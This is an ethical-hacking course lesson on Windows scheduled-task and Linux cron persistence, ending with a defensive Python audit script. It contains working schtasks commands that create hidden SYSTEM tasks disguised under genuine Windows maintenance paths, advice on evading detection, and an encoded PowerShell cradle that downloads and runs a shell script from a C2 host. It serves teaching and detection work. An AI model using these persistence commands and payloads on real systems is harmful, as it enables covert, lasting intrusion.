📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
Part of the Ethical Hacking Mastery Course — 100 Days
Day 39 of 100 · 39% complete
⚠️ Authorised Environments Only. The scheduled task and cron job persistence techniques demonstrated here must only be practised in your own lab — DVWA, TryHackMe, or HackTheBox machines. Creating persistence on systems you neither own nor have explicit written authorisation to test is a criminal offence.
The blue team found the scheduled task. They deleted it, declared the system clean, and closed the incident. Six hours later the attacker was back — because the task they found was the decoy. The real persistence was a second task registered under the name of a legitimate Windows maintenance process, running a single obfuscated PowerShell line every night at 3AM. Scheduled task persistence is the technique I encounter most often on incident response engagements where the initial cleanup failed. Here’s how it works on both Windows and Linux — and how defenders actually detect it.
### 🎯 What You’ll Master in Day 39

- Create and conceal scheduled task persistence on Windows via schtasks
- Create cron-based persistence on Linux with multiple trigger options
- Understand naming conventions and trigger patterns that evade automated detection
- Enumerate and detect malicious scheduled tasks as a blue teamer
- Document scheduled task persistence findings in a red team report
⏱️ 40 min read · 3 exercises · Day 39 of 100

#### ✅ Before You Start

- Day 38 — Registry Persistence — run keys and COM hijacking established persistence through the Windows registry. Scheduled tasks are the second persistence tier: they survive account password changes, don’t require registry write access in all cases, and are easier to make trigger-based.
- Lab: Kali Linux + either a Windows VM or TryHackMe “Windows Persistence” room · Linux target (DVWA VM or any Metasploitable)

### 📋 Day 39 — Scheduled Tasks Cron Jobs Persistence

1. Windows — schtasks Persistence
2. Windows — Naming and Trigger Evasion
3. Linux — Cron and at Persistence
4. Detection — What Blue Teams Look For

Scheduled task persistence follows directly from Day 38’s registry persistence. Together they form the core persistence toolkit covered in the Ethical Hacking course. The Kali Linux Commands reference has the full schtasks and crontab syntax for lab work.
## Windows — schtasks Persistence
schtasks is the command-line interface to the Windows Task Scheduler. On an engagement, schtasks requires either administrative privileges or, in misconfigured environments, standard user access — I always check both. The key is creating a task that runs your payload reliably and blends with legitimate scheduled activity.
WINDOWS SCHTASKS PERSISTENCE

```powershell
# Basic scheduled task — runs on logon
schtasks /create /tn "SystemUpdateHelper" /tr "powershell.exe -WindowStyle Hidden -EncodedCommand [BASE64]" /sc ONLOGON /ru SYSTEM

# Daily at 3AM — less noisy than ONLOGON
schtasks /create /tn "\Microsoft\Windows\Maintenance\WinSAT" /tr "C:\Windows\System32\cmd.exe /c [payload]" /sc DAILY /st 03:00 /ru SYSTEM /f

# Trigger on system start (survives logoffs, requires SYSTEM)
schtasks /create /tn "WindowsDefenderUpdate" /tr "powershell.exe -nop -w hidden -c [payload]" /sc ONSTART /ru SYSTEM /rl HIGHEST /f

# Verify task was created
schtasks /query /tn "SystemUpdateHelper" /fo LIST

# Run task immediately to test
schtasks /run /tn "SystemUpdateHelper"

# List all tasks for enumeration
schtasks /query /fo CSV /nh | findstr /v "\Microsoft\Windows"
```
schtasks Persistence — Evasive Task Created

```text
C:> schtasks /create /tn "\Microsoft\Windows\Maintenance\WinSAT" /tr "powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgA…" /sc DAILY /st 03:00 /ru SYSTEM /f
SUCCESS: The scheduled task "\Microsoft\Windows\Maintenance\WinSAT" has successfully been created.

C:> schtasks /query /tn "\Microsoft\Windows\Maintenance\WinSAT" /fo LIST
TaskName: \Microsoft\Windows\Maintenance\WinSAT
Status: Ready
Run As: SYSTEM
```

→ Task uses real Windows path \Microsoft\Windows\Maintenance\ — blends with legitimate WinSAT tasks
📸 Scheduled task created under \Microsoft\Windows\Maintenance\WinSAT — a real Windows path that hosts legitimate SAT (System Assessment Tool) tasks. The malicious task uses the same folder structure and a similar task name, running SYSTEM-privileged PowerShell daily at 3AM with an encoded command payload. Automated detection that only flags unknown task folders will miss this entirely. Detection requires comparing the task’s command against a known-good baseline.
## Windows — Naming and Trigger Evasion
The naming strategy I use for scheduled task persistence on red team engagements follows one principle: use the existing Windows task namespace. Every legitimate Windows task has a specific path — place your task in the same path with a plausible name and automated detection that works by path-exclusion will skip it entirely.
EVASIVE NAMING STRATEGY

```powershell
# Legitimate Windows task paths (use these folders)
#   \Microsoft\Windows\Maintenance\                   → WinSAT runs here
#   \Microsoft\Windows\Application Experience\        → ProgramDataUpdater
#   \Microsoft\Windows\Defrag\                        → ScheduledDefrag
#   \Microsoft\Windows\WindowsUpdate\                 → Automatic Update tasks
#   \Microsoft\Windows\Power Efficiency Diagnostics\  → AnalyzeSystem

# Trigger selection for evasion
#   ONLOGON: noisy — security tools flag new ONLOGON tasks immediately
#   ONSTART: better — runs before most security tools initialise
#   DAILY + 3AM: best evasion — low activity window, normal maintenance slot
#   EVENT + System/EventID: advanced — triggers on specific event log entries

# Payload obfuscation — encoded PowerShell
$payload = 'IEX(New-Object Net.WebClient).DownloadString("http://C2/shell.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$encoded = [Convert]::ToBase64String($bytes)
Write-Output "powershell.exe -EncodedCommand $encoded"
```
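From the defender's side, the WinSAT caption says detection requires comparing each task's command against a known-good baseline, and the block above shows the payload travelling as Base64 of UTF-16LE text. The following is an added example, not code from the original article: it audits an export made with `schtasks /query /fo CSV /v`, flags any task that is missing from or differs from the baseline regardless of its folder, and decodes `-EncodedCommand` arguments for review. The baseline values, the `LAB-PC` host and the sample rows are constructed.

```python
import base64, csv, io, re

# Constructed known-good baseline (task name -> expected "Task To Run").
# Record your own values from a clean image of the same Windows build.
BASELINE = {
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"C:\Windows\system32\defrag.exe -c -h -o -$",
    r"\Microsoft\Windows\Maintenance\WinSAT": "COM handler",
}

# Constructed sample export, reduced to the columns used here.
# schtasks repeats the header row per task folder, so one repeat is included.
_B64 = base64.b64encode("Write-Output 'lab'".encode("utf-16-le")).decode()
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User"
"LAB-PC","\Microsoft\Windows\Defrag\ScheduledDefrag","C:\Windows\system32\defrag.exe -c -h -o -$","SYSTEM"
"LAB-PC","\Microsoft\Windows\Maintenance\WinSAT","powershell.exe -WindowStyle Hidden -EncodedCommand {B64}","SYSTEM"
"HostName","TaskName","Task To Run","Run As User"
"LAB-PC","\SystemUpdateHelper","powershell.exe -nop -w hidden -c Write-Output lab","SYSTEM"
'''.replace("{B64}", _B64)

ENC_FLAG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(action):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    for flag, blob in ENC_FLAG.findall(action):
        # PowerShell accepts prefixes of the parameter name, so match those too.
        if "encodedcommand".startswith(flag.lower()):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:
                return "<undecodable>"
    return None

def audit_tasks(csv_text, baseline):
    """Flag tasks that are missing from the baseline or whose command differs."""
    findings = {}  # keyed by task name, so multi-trigger duplicate rows collapse
    for row in csv.DictReader(io.StringIO(csv_text)):
        name, action = row["TaskName"], row["Task To Run"]
        if name == "TaskName":  # repeated header row
            continue
        expected = baseline.get(name)
        if expected is not None and action.strip().lower() == expected.strip().lower():
            continue
        reason = "not in baseline" if expected is None else "command differs from baseline"
        findings[name] = {"reason": reason, "run_as": row["Run As User"],
                          "action": action, "decoded": decode_encoded_command(action)}
    return findings

if __name__ == "__main__":
    for task, info in audit_tasks(SAMPLE_CSV, BASELINE).items():
        print(task, "|", info["reason"], "|", info["decoded"] or info["action"])
```

Because the comparison is keyed on the full task name and its command rather than on the folder, a task placed under `\Microsoft\Windows\` is reviewed like any other.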